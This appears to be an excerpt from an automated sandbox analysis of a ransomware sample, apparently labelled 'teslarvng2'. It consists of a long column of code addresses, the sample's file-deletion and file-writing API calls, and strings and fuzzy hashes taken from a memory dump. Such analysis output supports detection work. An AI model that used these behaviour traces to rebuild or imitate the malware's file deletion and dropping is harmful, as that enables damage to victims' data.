                                                                    0x00e69e26
                                                                    0x00e69e2d
                                                                    0x00e69e30
                                                                    0x00e69e35
                                                                    0x00e69e39
                                                                    0x00e69e3f
                                                                    0x00e69e45
                                                                    0x00e69e4a
                                                                    0x00e69e4f
                                                                    0x00e6a264
                                                                    0x00e6a26b
                                                                    0x00e6a272
                                                                    0x00e6a279
                                                                    0x00e6a280
                                                                    0x00e6a284
                                                                    0x00e6a288
                                                                    0x00e6a28e
                                                                    0x00e6a291
                                                                    0x00e6a293
                                                                    0x00e6a5cb
                                                                    0x00e6a5cd
                                                                    0x00e6a5cf
                                                                    0x00e6a5d3
                                                                    0x00e6a5d5
                                                                    0x00e6a5d5
                                                                    0x00e6a5d7
                                                                    0x00e6a5d8
                                                                    0x00000000
                                                                    0x00e6a5d8
                                                                    0x00e6a299
                                                                    0x00e6a2a1
                                                                    0x00e6a2a5
                                                                    0x00e6a2ad
                                                                    0x00e6a2c6
                                                                    0x00e6a2cd
                                                                    0x00e6a2cf
                                                                    0x00e6a2cf
                                                                    0x00e6a2d5
                                                                    0x00e6a2db
                                                                    0x00e6a2de
                                                                    0x00e6a2e4
                                                                    0x00e6a2ea
                                                                    0x00e6a2f1
                                                                    0x00e6a2f7
                                                                    0x00e6a302
                                                                    0x00e6a302
                                                                    0x00e6a304
                                                                    0x00e6a311
                                                                    0x00e6a319
                                                                    0x00e6a324
                                                                    0x00e6a32a
                                                                    0x00e6a335
                                                                    0x00e6a33b
                                                                    0x00e6a34a
                                                                    0x00e6a35c
                                                                    0x00e6a361
                                                                    0x00e6a36d
                                                                    0x00e6a370
                                                                    0x00e6a376
                                                                    0x00e6a386
                                                                    0x00e6a38c
                                                                    0x00e6a38e
                                                                    0x00e6a396
                                                                    0x00e6a39c
                                                                    0x00e6a3a0
                                                                    0x00e6a3a2
                                                                    0x00e6a3a8
                                                                    0x00e6a3af
                                                                    0x00e6a3bb
                                                                    0x00e6a3bb
                                                                    0x00e6a3bd
                                                                    0x00e6a3c1
                                                                    0x00e6a3c7
                                                                    0x00e6a3d0
                                                                    0x00e6a3d5
                                                                    0x00e6a3da
                                                                    0x00e6a3e7
                                                                    0x00e6a3ea
                                                                    0x00e6a3ec
                                                                    0x00e6a3ec
                                                                    0x00e6a3ec
                                                                    0x00000000
                                                                    0x00e6a2f9
                                                                    0x00e6a2f9
                                                                    0x00e6a2fc
                                                                    0x00000000
                                                                    0x00e6a302
                                                                    0x00e6a302
                                                                    0x00000000
                                                                    0x00e6a3f1
                                                                    0x00e6a3f1
                                                                    0x00e6a3f7
                                                                    0x00e6a3fd
                                                                    0x00e6a403
                                                                    0x00e6a403
                                                                    0x00e6a40b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6a416
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6a438
                                                                    0x00e6a43e
                                                                    0x00e6a445
                                                                    0x00e6a448
                                                                    0x00e6a44e
                                                                    0x00e6a454
                                                                    0x00e6a45e
                                                                    0x00e6a460
                                                                    0x00e6a462
                                                                    0x00e6a46e
                                                                    0x00e6a46e
                                                                    0x00e6a478
                                                                    0x00e6a482
                                                                    0x00e6a48b
                                                                    0x00e6a491
                                                                    0x00e6a49e
                                                                    0x00e6a4ad
                                                                    0x00e6a4b3
                                                                    0x00e6a4b8
                                                                    0x00e6a4bb
                                                                    0x00e6a4bd
                                                                    0x00e6a4cf
                                                                    0x00e6a4d4
                                                                    0x00e6a4d9
                                                                    0x00e6a4e3
                                                                    0x00e6a4f0
                                                                    0x00e6a4f7
                                                                    0x00e6a4fe
                                                                    0x00e6a503
                                                                    0x00e6a50b
                                                                    0x00e6a512
                                                                    0x00e6a519
                                                                    0x00e6a524
                                                                    0x00e6a52c
                                                                    0x00e6a532
                                                                    0x00e6a537
                                                                    0x00e6a540
                                                                    0x00e6a550
                                                                    0x00e6a55a
                                                                    0x00e6a55e
                                                                    0x00e6a565
                                                                    0x00e6a56d
                                                                    0x00e6a572
                                                                    0x00e6a578
                                                                    0x00e6a582
                                                                    0x00e6a587
                                                                    0x00e6a591
                                                                    0x00e6a596
                                                                    0x00e6a599
                                                                    0x00e6a59f
                                                                    0x00e6a5a9
                                                                    0x00e6a5ae
                                                                    0x00e6a5b4
                                                                    0x00e6a5b7
                                                                    0x00e6a5b9
                                                                    0x00e6a5bb
                                                                    0x00e6a5bf
                                                                    0x00e6a5c2
                                                                    0x00e6a5db
                                                                    0x00e6a5db
                                                                    0x00e6a5dc
                                                                    0x00e6a5dc
                                                                    0x00000000
                                                                    0x00e6a40d
                                                                    0x00e6a40d
                                                                    0x00e6a40d
                                                                    0x00e6a302
                                                                    0x00e6a2fc
                                                                    0x00e6a416
                                                                    0x00e6a41b
                                                                    0x00e6a420
                                                                    0x00e6a42d
                                                                    0x00e6a430
                                                                    0x00e6a432
                                                                    0x00e6a432
                                                                    0x00e6a5e1
                                                                    0x00e6a5e1
                                                                    0x00e6a5f1
                                                                    0x00e6a5f6
                                                                    0x00e6a5f9
                                                                    0x00e6a5fd
                                                                    0x00e6a601
                                                                    0x00e6a603
                                                                    0x00e6a603
                                                                    0x00e6a606
                                                                    0x00e6a60c
                                                                    0x00e6a616
                                                                    0x00e6a61b
                                                                    0x00e6a62b
                                                                    0x00e6a630
                                                                    0x00e6a633
                                                                    0x00e6a637
                                                                    0x00e6a63b
                                                                    0x00e6a63d
                                                                    0x00e6a63d
                                                                    0x00e6a642
                                                                    0x00e6a648
                                                                    0x00e6a652
                                                                    0x00e6a657
                                                                    0x00e6a65d
                                                                    0x00e6a662
                                                                    0x00e6a668
                                                                    0x00e6a66a
                                                                    0x00e6a670
                                                                    0x00e6a672
                                                                    0x00e6ac4d
                                                                    0x00e6ac4d
                                                                    0x00e6ac4f
                                                                    0x00e6ac55
                                                                    0x00e6af72
                                                                    0x00e6af72
                                                                    0x00e6af78
                                                                    0x00e6af7e
                                                                    0x00e6af84
                                                                    0x00e6af86
                                                                    0x00e6af8a
                                                                    0x00e6af8c
                                                                    0x00e6af8c
                                                                    0x00e6af8e
                                                                    0x00e6af8f
                                                                    0x00e6af90
                                                                    0x00e6af99
                                                                    0x00e6afa1
                                                                    0x00e6afa4
                                                                    0x00000000
                                                                    0x00e6afaa
                                                                    0x00e6afaa
                                                                    0x00e6afb8
                                                                    0x00e6afd3
                                                                    0x00e6afd8
                                                                    0x00e6afde
                                                                    0x00e6afe6
                                                                    0x00e6afec
                                                                    0x00e6aff5
                                                                    0x00e6affa
                                                                    0x00e6affd
                                                                    0x00e6b001
                                                                    0x00e6b005
                                                                    0x00e6b00a
                                                                    0x00e6b010
                                                                    0x00e6b016
                                                                    0x00e6b020
                                                                    0x00e6b025
                                                                    0x00e6b02b
                                                                    0x00e6b02f
                                                                    0x00e6b030
                                                                    0x00e6b034
                                                                    0x00e6b036
                                                                    0x00e6b036
                                                                    0x00e6b038
                                                                    0x00e6b03a
                                                                    0x00e6b040
                                                                    0x00e6b041
                                                                    0x00e6b045
                                                                    0x00e6b047
                                                                    0x00e6b047
                                                                    0x00e6b049
                                                                    0x00e6b04b
                                                                    0x00e6b04f
                                                                    0x00e6b056
                                                                    0x00000000
                                                                    0x00e6b05b
                                                                    0x00000000
                                                                    0x00e6ac60
                                                                    0x00e6ac60
                                                                    0x00e6ac64
                                                                    0x00e6ac67
                                                                    0x00e6ac6a
                                                                    0x00e6ac70
                                                                    0x00e6ac77
                                                                    0x00e6ac7e
                                                                    0x00e6ac84
                                                                    0x00e6ac88
                                                                    0x00e6ac88
                                                                    0x00e6ac8e
                                                                    0x00e6ac91
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6ac93
                                                                    0x00e6ac96
                                                                    0x00e6ac99
                                                                    0x00e6aca0
                                                                    0x00e6ad1e
                                                                    0x00e6ad1e
                                                                    0x00e6ad22
                                                                    0x00e6ad28
                                                                    0x00e6ad2e
                                                                    0x00e6ad35
                                                                    0x00e6ad3b
                                                                    0x00e6ad3f
                                                                    0x00e6ad3f
                                                                    0x00e6ad45
                                                                    0x00e6ad4f
                                                                    0x00e6ad53
                                                                    0x00e6ad55
                                                                    0x00e6ad5f
                                                                    0x00e6ad66
                                                                    0x00e6ad70
                                                                    0x00e6ad76
                                                                    0x00e6ad81
                                                                    0x00e6ad8e
                                                                    0x00e6ad98
                                                                    0x00e6ada2
                                                                    0x00e6ada7
                                                                    0x00e6adb4
                                                                    0x00e6adc1
                                                                    0x00e6adc6
                                                                    0x00e6add5
                                                                    0x00e6ade2
                                                                    0x00e6ade9
                                                                    0x00e6adef
                                                                    0x00e6adf6
                                                                    0x00e6adf9
                                                                    0x00e6adfd
                                                                    0x00e6ae02
                                                                    0x00e6ae07
                                                                    0x00e6ae0e
                                                                    0x00e6ae15
                                                                    0x00e6ae18
                                                                    0x00e6ae1e
                                                                    0x00e6ae2a
                                                                    0x00e6ae2f
                                                                    0x00e6ae39
                                                                    0x00e6ae3f
                                                                    0x00e6ae4b
                                                                    0x00e6ae51
                                                                    0x00e6ae54
                                                                    0x00e6ae5b
                                                                    0x00e6ae60
                                                                    0x00e6ae68
                                                                    0x00e6ae71
                                                                    0x00e6ae78
                                                                    0x00e6ae83
                                                                    0x00e6ae89
                                                                    0x00e6ae8e
                                                                    0x00e6ae91
                                                                    0x00e6ae9b
                                                                    0x00e6aea4
                                                                    0x00e6aebc
                                                                    0x00e6aec2
                                                                    0x00e6aec8
                                                                    0x00e6aecb
                                                                    0x00e6aee3
                                                                    0x00e6aeef
                                                                    0x00e6aefb
                                                                    0x00e6aefb
                                                                    0x00e6af01
                                                                    0x00e6af0b
                                                                    0x00e6af10
                                                                    0x00e6af16
                                                                    0x00e6af1c
                                                                    0x00e6af26
                                                                    0x00e6af2b
                                                                    0x00e6af31
                                                                    0x00e6af37
                                                                    0x00e6af3e
                                                                    0x00e6af43
                                                                    0x00e6af4d
                                                                    0x00e6af52
                                                                    0x00e6af59
                                                                    0x00e6af5e
                                                                    0x00e6af60
                                                                    0x00e6af66
                                                                    0x00000000
                                                                    0x00e6af68
                                                                    0x00e6af68
                                                                    0x00000000
                                                                    0x00e6af68
                                                                    0x00000000
                                                                    0x00e6aca6
                                                                    0x00e6aca8
                                                                    0x00e6acab
                                                                    0x00e6acb1
                                                                    0x00e6acb4
                                                                    0x00e6acb7
                                                                    0x00e6acbc
                                                                    0x00e6ace5
                                                                    0x00e6ace7
                                                                    0x00e6acf6
                                                                    0x00e6acf6
                                                                    0x00e6ace9
                                                                    0x00e6ace9
                                                                    0x00e6acea
                                                                    0x00e6acef
                                                                    0x00e6acf2
                                                                    0x00e6acf2
                                                                    0x00000000
                                                                    0x00e6acbe
                                                                    0x00e6acbe
                                                                    0x00e6acc1
                                                                    0x00e6acc3
                                                                    0x00000000
                                                                    0x00e6acc9
                                                                    0x00e6acc9
                                                                    0x00e6acca
                                                                    0x00e6accf
                                                                    0x00e6acd2
                                                                    0x00e6acd4
                                                                    0x00000000
                                                                    0x00e6acda
                                                                    0x00e6acda
                                                                    0x00e6acdd
                                                                    0x00e6ace0
                                                                    0x00e6acf8
                                                                    0x00e6acfe
                                                                    0x00e6acff
                                                                    0x00e6ad0a
                                                                    0x00e6ad15
                                                                    0x00e6ad18
                                                                    0x00e6ad1b
                                                                    0x00000000
                                                                    0x00e6ad1b
                                                                    0x00e6acd4
                                                                    0x00e6acc3
                                                                    0x00000000
                                                                    0x00e6acbc
                                                                    0x00e6ac60
                                                                    0x00e6a680
                                                                    0x00e6a680
                                                                    0x00e6a680
                                                                    0x00e6a683
                                                                    0x00e6a686
                                                                    0x00e6a68c
                                                                    0x00e6a693
                                                                    0x00e6a69a
                                                                    0x00e6a69e
                                                                    0x00e6a6a4
                                                                    0x00e6a6a8
                                                                    0x00e6a6a8
                                                                    0x00e6a6ae
                                                                    0x00e6a6b1
                                                                    0x00e6a6c8
                                                                    0x00e6a6cb
                                                                    0x00e6a6d1
                                                                    0x00e6a6d4
                                                                    0x00e6a6d7
                                                                    0x00e6a6dc
                                                                    0x00e6a705
                                                                    0x00e6a707
                                                                    0x00e6a716
                                                                    0x00e6a716
                                                                    0x00e6a709
                                                                    0x00e6a709
                                                                    0x00e6a70a
                                                                    0x00e6a70f
                                                                    0x00e6a712
                                                                    0x00e6a712
                                                                    0x00000000
                                                                    0x00e6a6de
                                                                    0x00e6a6de
                                                                    0x00e6a6e1
                                                                    0x00e6a6e3
                                                                    0x00000000
                                                                    0x00e6a6e9
                                                                    0x00e6a6e9
                                                                    0x00e6a6ea
                                                                    0x00e6a6ef
                                                                    0x00e6a6f2
                                                                    0x00e6a6f4
                                                                    0x00000000
                                                                    0x00e6a6fa
                                                                    0x00e6a6fa
                                                                    0x00e6a6fd
                                                                    0x00e6a700
                                                                    0x00e6a718
                                                                    0x00e6a71e
                                                                    0x00e6a71f
                                                                    0x00e6a72a
                                                                    0x00e6a735
                                                                    0x00e6a738
                                                                    0x00e6a73b
                                                                    0x00000000
                                                                    0x00e6a73b
                                                                    0x00e6a6f4
                                                                    0x00e6a6e3
                                                                    0x00e6a6b3
                                                                    0x00e6a6b3
                                                                    0x00e6a6b6
                                                                    0x00e6a6b9
                                                                    0x00e6a6c0
                                                                    0x00000000
                                                                    0x00e6a6c0
                                                                    0x00000000
                                                                    0x00e6a73e
                                                                    0x00e6a73e
                                                                    0x00e6a745
                                                                    0x00e6a74c
                                                                    0x00e6a750
                                                                    0x00e6a752
                                                                    0x00e6a75c
                                                                    0x00e6a763
                                                                    0x00e6a76d
                                                                    0x00e6a773
                                                                    0x00e6a77e
                                                                    0x00e6a78b
                                                                    0x00e6a795
                                                                    0x00e6a79f
                                                                    0x00e6a7a4
                                                                    0x00e6a7b1
                                                                    0x00e6a7be
                                                                    0x00e6a7c3
                                                                    0x00e6a7d2
                                                                    0x00e6a7df
                                                                    0x00e6a7e9
                                                                    0x00e6a7ef
                                                                    0x00e6a7f9
                                                                    0x00e6a7fc
                                                                    0x00e6a803
                                                                    0x00e6a808
                                                                    0x00e6a810
                                                                    0x00e6a817
                                                                    0x00e6a81e
                                                                    0x00e6a821
                                                                    0x00e6a827
                                                                    0x00e6a836
                                                                    0x00e6a83b
                                                                    0x00e6a847
                                                                    0x00e6a851
                                                                    0x00e6a857
                                                                    0x00e6a85a
                                                                    0x00e6a861
                                                                    0x00e6a866
                                                                    0x00e6a86e
                                                                    0x00e6a875
                                                                    0x00e6a87c
                                                                    0x00e6a885
                                                                    0x00e6a88b
                                                                    0x00e6a892
                                                                    0x00e6a89a
                                                                    0x00e6a8a0
                                                                    0x00e6a8a6
                                                                    0x00e6a8ac
                                                                    0x00e6a8b6
                                                                    0x00e6a8c1
                                                                    0x00e6a8c7
                                                                    0x00e6a8d1
                                                                    0x00e6a8d6
                                                                    0x00e6a8e0
                                                                    0x00e6a8e5
                                                                    0x00e6a8ef
                                                                    0x00e6a8f3
                                                                    0x00e6a8f5
                                                                    0x00e6a8ff
                                                                    0x00e6a906
                                                                    0x00e6a910
                                                                    0x00e6a916
                                                                    0x00e6a921
                                                                    0x00e6a92e
                                                                    0x00e6a938
                                                                    0x00e6a942
                                                                    0x00e6a947
                                                                    0x00e6a954
                                                                    0x00e6a961
                                                                    0x00e6a966
                                                                    0x00e6a975
                                                                    0x00e6a982
                                                                    0x00e6a989
                                                                    0x00e6a98f
                                                                    0x00e6a996
                                                                    0x00e6a999
                                                                    0x00e6a99d
                                                                    0x00e6a9a2
                                                                    0x00e6a9a7
                                                                    0x00e6a9ae
                                                                    0x00e6a9b5
                                                                    0x00e6a9b8
                                                                    0x00e6a9be
                                                                    0x00e6a9ca
                                                                    0x00e6a9cf
                                                                    0x00e6a9db
                                                                    0x00e6a9e5
                                                                    0x00e6a9ec
                                                                    0x00e6a9ef
                                                                    0x00e6a9f6
                                                                    0x00e6a9fb
                                                                    0x00e6aa03
                                                                    0x00e6aa0a
                                                                    0x00e6aa11
                                                                    0x00e6aa1a
                                                                    0x00e6aa20
                                                                    0x00e6aa27
                                                                    0x00e6aa2f
                                                                    0x00e6aa35
                                                                    0x00e6aa3b
                                                                    0x00e6aa41
                                                                    0x00e6aa4b
                                                                    0x00e6aa56
                                                                    0x00e6aa5c
                                                                    0x00e6aa63
                                                                    0x00e6aa68
                                                                    0x00e6aa72
                                                                    0x00e6aa77
                                                                    0x00e6aa81
                                                                    0x00e6aa8b
                                                                    0x00e6aa8f
                                                                    0x00e6aa92
                                                                    0x00e6aa96
                                                                    0x00e6aaa0
                                                                    0x00e6aaa6
                                                                    0x00e6aab1
                                                                    0x00e6aabe
                                                                    0x00e6aac8
                                                                    0x00e6aad2
                                                                    0x00e6aad7
                                                                    0x00e6aae4
                                                                    0x00e6aaf1
                                                                    0x00e6aaf6
                                                                    0x00e6ab05
                                                                    0x00e6ab12
                                                                    0x00e6ab1c
                                                                    0x00e6ab22
                                                                    0x00e6ab2c
                                                                    0x00e6ab2f
                                                                    0x00e6ab36
                                                                    0x00e6ab3b
                                                                    0x00e6ab43
                                                                    0x00e6ab4a
                                                                    0x00e6ab51
                                                                    0x00e6ab54
                                                                    0x00e6ab5a
                                                                    0x00e6ab69
                                                                    0x00e6ab6e
                                                                    0x00e6ab7a
                                                                    0x00e6ab84
                                                                    0x00e6ab8c
                                                                    0x00e6ab8f
                                                                    0x00e6ab96
                                                                    0x00e6ab9b
                                                                    0x00e6aba3
                                                                    0x00e6abaa
                                                                    0x00e6abb1
                                                                    0x00e6abba
                                                                    0x00e6abc0
                                                                    0x00e6abc7
                                                                    0x00e6abcf
                                                                    0x00e6abd5
                                                                    0x00e6abdb
                                                                    0x00e6abe1
                                                                    0x00e6abeb
                                                                    0x00e6abf0
                                                                    0x00e6abf6
                                                                    0x00e6abfc
                                                                    0x00e6ac06
                                                                    0x00e6ac0b
                                                                    0x00e6ac15
                                                                    0x00e6ac1a
                                                                    0x00e6ac21
                                                                    0x00e6ac2c
                                                                    0x00e6ac31
                                                                    0x00e6ac33
                                                                    0x00e6ac39
                                                                    0x00e6ac39
                                                                    0x00e6ac41
                                                                    0x00e6ac47
                                                                    0x00000000
                                                                    0x00e6ac47
                                                                    0x00e69e55
                                                                    0x00e69e59
                                                                    0x00e69e5b
                                                                    0x00e69e5d
                                                                    0x00e69e5d
                                                                    0x00e69e5f
                                                                    0x00e69e66
                                                                    0x00e69e69
                                                                    0x00e69e6e
                                                                    0x00e69e74
                                                                    0x00e69e76
                                                                    0x00e69e78
                                                                    0x00e69e82
                                                                    0x00e69e82
                                                                    0x00e69e85
                                                                    0x00e69e88
                                                                    0x00e69e8d
                                                                    0x00e69e93
                                                                    0x00e69e9a
                                                                    0x00e69ea1
                                                                    0x00e69ea7
                                                                    0x00e69eab
                                                                    0x00e69eab
                                                                    0x00e69eb4
                                                                    0x00e69ecb
                                                                    0x00e69ece
                                                                    0x00e69ed4
                                                                    0x00e69ed7
                                                                    0x00e69eda
                                                                    0x00e69edf
                                                                    0x00e69f08
                                                                    0x00e69f0a
                                                                    0x00e69f19
                                                                    0x00e69f19
                                                                    0x00e69f0c
                                                                    0x00e69f0c
                                                                    0x00e69f0d
                                                                    0x00e69f12
                                                                    0x00e69f15
                                                                    0x00e69f15
                                                                    0x00000000
                                                                    0x00e69ee1
                                                                    0x00e69ee1
                                                                    0x00e69ee4
                                                                    0x00e69ee6
                                                                    0x00e6b2fc
                                                                    0x00e6b2fc
                                                                    0x00e6b301
                                                                    0x00e6b301
                                                                    0x00e6b306
                                                                    0x00e6b306
                                                                    0x00e6b30b
                                                                    0x00e6b30b
                                                                    0x00e6b310
                                                                    0x00e6b310
                                                                    0x00e6b315
                                                                    0x00e6b316
                                                                    0x00e6b317
                                                                    0x00e6b318
                                                                    0x00e6b319
                                                                    0x00e6b31a
                                                                    0x00e6b31b
                                                                    0x00e6b31c
                                                                    0x00e6b31d
                                                                    0x00e6b31e
                                                                    0x00e6b31f
                                                                    0x00e6b320
                                                                    0x00e6b321
                                                                    0x00e6b323
                                                                    0x00e6b325
                                                                    0x00e6b330
                                                                    0x00e6b334
                                                                    0x00e6b339
                                                                    0x00e6b33b
                                                                    0x00e6b33e
                                                                    0x00e6b33f
                                                                    0x00e6b340
                                                                    0x00e6b344
                                                                    0x00e6b34a
                                                                    0x00e6b34d
                                                                    0x00e6b357
                                                                    0x00e6b35d
                                                                    0x00e6b378
                                                                    0x00e6b37a
                                                                    0x00e6b37d
                                                                    0x00e6b38a
                                                                    0x00e6b391
                                                                    0x00e6b398
                                                                    0x00e6b398
                                                                    0x00e6b39e
                                                                    0x00e6b3a8
                                                                    0x00e6b3b0
                                                                    0x00e6b3bd
                                                                    0x00e6b3c7
                                                                    0x00e69eec
                                                                    0x00e69eec
                                                                    0x00e69eed
                                                                    0x00e69ef2
                                                                    0x00e69ef5
                                                                    0x00e69ef7
                                                                    0x00e6b2f7
                                                                    0x00e6b2f7
                                                                    0x00000000
                                                                    0x00e69efd
                                                                    0x00e69efd
                                                                    0x00e69f00
                                                                    0x00e69f03
                                                                    0x00e69f1b
                                                                    0x00e69f21
                                                                    0x00e69f22
                                                                    0x00e69f2d
                                                                    0x00e69f38
                                                                    0x00e69f3b
                                                                    0x00e69f3e
                                                                    0x00000000
                                                                    0x00e69f3e
                                                                    0x00e69ef7
                                                                    0x00e69ee6
                                                                    0x00e69eb6
                                                                    0x00e69eb6
                                                                    0x00e69eb9
                                                                    0x00e69ebc
                                                                    0x00e69ec3
                                                                    0x00e69f41
                                                                    0x00e69f41
                                                                    0x00e69f4f
                                                                    0x00e69f59
                                                                    0x00e69f5d
                                                                    0x00e69f64
                                                                    0x00e69f6e
                                                                    0x00e69f74
                                                                    0x00e69f7f
                                                                    0x00e69f8c
                                                                    0x00e69f96
                                                                    0x00e69fa0
                                                                    0x00e69fa5
                                                                    0x00e69fb2
                                                                    0x00e69fbf
                                                                    0x00e69fc4
                                                                    0x00e69fd3
                                                                    0x00e69fe0
                                                                    0x00e69fea
                                                                    0x00e69fed
                                                                    0x00e69ff7
                                                                    0x00e69ffa
                                                                    0x00e6a001
                                                                    0x00e6a006
                                                                    0x00e6a00e
                                                                    0x00e6a015
                                                                    0x00e6a01c
                                                                    0x00e6a01f
                                                                    0x00e6a025
                                                                    0x00e6a034
                                                                    0x00e6a039
                                                                    0x00e6a045
                                                                    0x00e6a04f
                                                                    0x00e6a052
                                                                    0x00e6a055
                                                                    0x00e6a05c
                                                                    0x00e6a061
                                                                    0x00e6a069
                                                                    0x00e6a070
                                                                    0x00e6a077
                                                                    0x00e6a07a
                                                                    0x00e6a080
                                                                    0x00e6a090
                                                                    0x00e6a095
                                                                    0x00e6a0a1
                                                                    0x00e6a0ab
                                                                    0x00e6a0ae
                                                                    0x00e6a0b1
                                                                    0x00e6a0b8
                                                                    0x00e6a0bd
                                                                    0x00e6a0c5
                                                                    0x00e6a0cc
                                                                    0x00e6a0d3
                                                                    0x00e6a0dc
                                                                    0x00e6a0e9
                                                                    0x00e6a0f1
                                                                    0x00e6a0f7
                                                                    0x00e6a0fa
                                                                    0x00e6a100
                                                                    0x00e6a10a
                                                                    0x00e6a10f
                                                                    0x00e6a112
                                                                    0x00e6a118
                                                                    0x00e6a122
                                                                    0x00e6a127
                                                                    0x00e6a12a
                                                                    0x00e6a130
                                                                    0x00e6a13a
                                                                    0x00e6a13f
                                                                    0x00e6a149
                                                                    0x00e6a14e
                                                                    0x00e6a155
                                                                    0x00e6a15a
                                                                    0x00e6a15c
                                                                    0x00000000
                                                                    0x00e6a15c
                                                                    0x00000000
                                                                    0x00e69eb4
                                                                    0x00e6a167
                                                                    0x00e6a16b
                                                                    0x00e6a170
                                                                    0x00e6a17a
                                                                    0x00e6a17d
                                                                    0x00000000
                                                                    0x00e6a183
                                                                    0x00e6a183
                                                                    0x00e6a191
                                                                    0x00e6a1ac
                                                                    0x00e6a1b1
                                                                    0x00e6a1b4
                                                                    0x00e6a1ba
                                                                    0x00e6a1c6
                                                                    0x00e6a1cb
                                                                    0x00e6a1d7
                                                                    0x00e6a1e1
                                                                    0x00e6a1e4
                                                                    0x00e6a1e7
                                                                    0x00e6a1ee
                                                                    0x00e6a1f3
                                                                    0x00e6a1fb
                                                                    0x00e6a202
                                                                    0x00e6a209
                                                                    0x00e6a212
                                                                    0x00e6a218
                                                                    0x00e6a21f
                                                                    0x00e6a227
                                                                    0x00e6a22d
                                                                    0x00e6a230
                                                                    0x00e6a236
                                                                    0x00e6a240
                                                                    0x00e6a245
                                                                    0x00e6a248
                                                                    0x00e6a24e
                                                                    0x00e6a258
                                                                    0x00e6b060
                                                                    0x00e6b060
                                                                    0x00e6b062
                                                                    0x00e6b067
                                                                    0x00e6b06b
                                                                    0x00e6b071
                                                                    0x00e6b073
                                                                    0x00e6b076
                                                                    0x00000000
                                                                    0x00e6b07c
                                                                    0x00e6b07c
                                                                    0x00e6b08a
                                                                    0x00e6b0a2
                                                                    0x00e6b0a7
                                                                    0x00e6b0aa
                                                                    0x00e6b0b0
                                                                    0x00e6b0b8
                                                                    0x00e6b0c5
                                                                    0x00e6b0cd
                                                                    0x00e6b0d1
                                                                    0x00e6b0d5
                                                                    0x00e6b0e0
                                                                    0x00e6b0e6
                                                                    0x00e6b0ed
                                                                    0x00e6b0f2
                                                                    0x00e6b0fe
                                                                    0x00e6b103
                                                                    0x00e6b116
                                                                    0x00e6b118
                                                                    0x00e6b11c
                                                                    0x00e6b128
                                                                    0x00e6b12e
                                                                    0x00e6b139
                                                                    0x00e6b141
                                                                    0x00e6b147
                                                                    0x00e6b14e
                                                                    0x00e6b15f
                                                                    0x00e6b16f
                                                                    0x00e6b179
                                                                    0x00e6b17f
                                                                    0x00e6b183
                                                                    0x00e6b18a
                                                                    0x00e6b18f
                                                                    0x00e6b197
                                                                    0x00e6b19e
                                                                    0x00e6b1a5
                                                                    0x00e6b1a8
                                                                    0x00e6b1ae
                                                                    0x00e6b1b3
                                                                    0x00e6b1b6
                                                                    0x00e6b1ba
                                                                    0x00e6b1c0
                                                                    0x00e6b1c6
                                                                    0x00e6b1d0
                                                                    0x00e6b1d5
                                                                    0x00e6b1dc
                                                                    0x00e6b1e1
                                                                    0x00e6b1eb
                                                                    0x00e6b1f0
                                                                    0x00e6b1fd
                                                                    0x00e6b203
                                                                    0x00e6b20a
                                                                    0x00e6b20b
                                                                    0x00e6b214
                                                                    0x00e6b21c
                                                                    0x00e6b21f
                                                                    0x00000000
                                                                    0x00e6b225
                                                                    0x00e6b225
                                                                    0x00e6b233
                                                                    0x00e6b24e
                                                                    0x00e6b256
                                                                    0x00e6b25c
                                                                    0x00e6b264
                                                                    0x00e6b271
                                                                    0x00e6b279
                                                                    0x00e6b27d
                                                                    0x00e6b281
                                                                    0x00e6b28c
                                                                    0x00e6b292
                                                                    0x00e6b29c
                                                                    0x00e6b2a1
                                                                    0x00e6b2ab
                                                                    0x00e6b2b0
                                                                    0x00e6b2ba
                                                                    0x00e6b2bf
                                                                    0x00e6b2cb
                                                                    0x00e6b2d6
                                                                    0x00e6b2e3
                                                                    0x00e6b2f0
                                                                    0x00e6b2f0
                                                                    0x00e6b21f
                                                                    0x00e6b076
                                                                    0x00e6a17d
                                                                    0x00e69e4f
                                                                    0x00000000

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,teslarvng2,00ED9CA4,?,00000000,00000000,00000000), ref: 00E6A0F1
                                                                    • DeleteFileW.KERNEL32(?,?,00F2C23C,00000006,\\?\c:,00000006,\programdata\dat,00000010), ref: 00E6A227
                                                                      • Part of subcall function 00E6B320: CreateFileW.KERNEL32(000000FF,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00E6B372
                                                                      • Part of subcall function 00E6B320: WriteFile.KERNEL32(00000000,?,?,A6ABE2D4,00000000), ref: 00E6B38A
                                                                      • Part of subcall function 00E6B320: FlushFileBuffers.KERNEL32(00000000), ref: 00E6B391
                                                                      • Part of subcall function 00E6B320: CloseHandle.KERNEL32(00000000), ref: 00E6B398
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6B2CB
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E6B2FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$Delete$BuffersCloseConcurrency::cancel_current_taskCreateFlushHandleMtx_unlockWrite
                                                                    • String ID: /Kim$/Kim$\\?\c:$\pos.txt$\programdata\dat$\st.xpi$kbyc$teslarvng2
                                                                    • API String ID: 908382771-3330352913
                                                                    • Opcode ID: 700bb65a7d45c88f509beee3c030680022d3297c199ad2f19460d0d1b42f1831
                                                                    • Instruction ID: 812adee51e6b81d608c5c96198af4c5314a2f18d4d559d5fedc33e4fcb333b5a
                                                                    • Opcode Fuzzy Hash: 700bb65a7d45c88f509beee3c030680022d3297c199ad2f19460d0d1b42f1831
                                                                    • Instruction Fuzzy Hash: 1FD26C70D05268CEEB24DF68CD55BDDBBB1AF15304F1482E9D409B7292DBB05A88CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
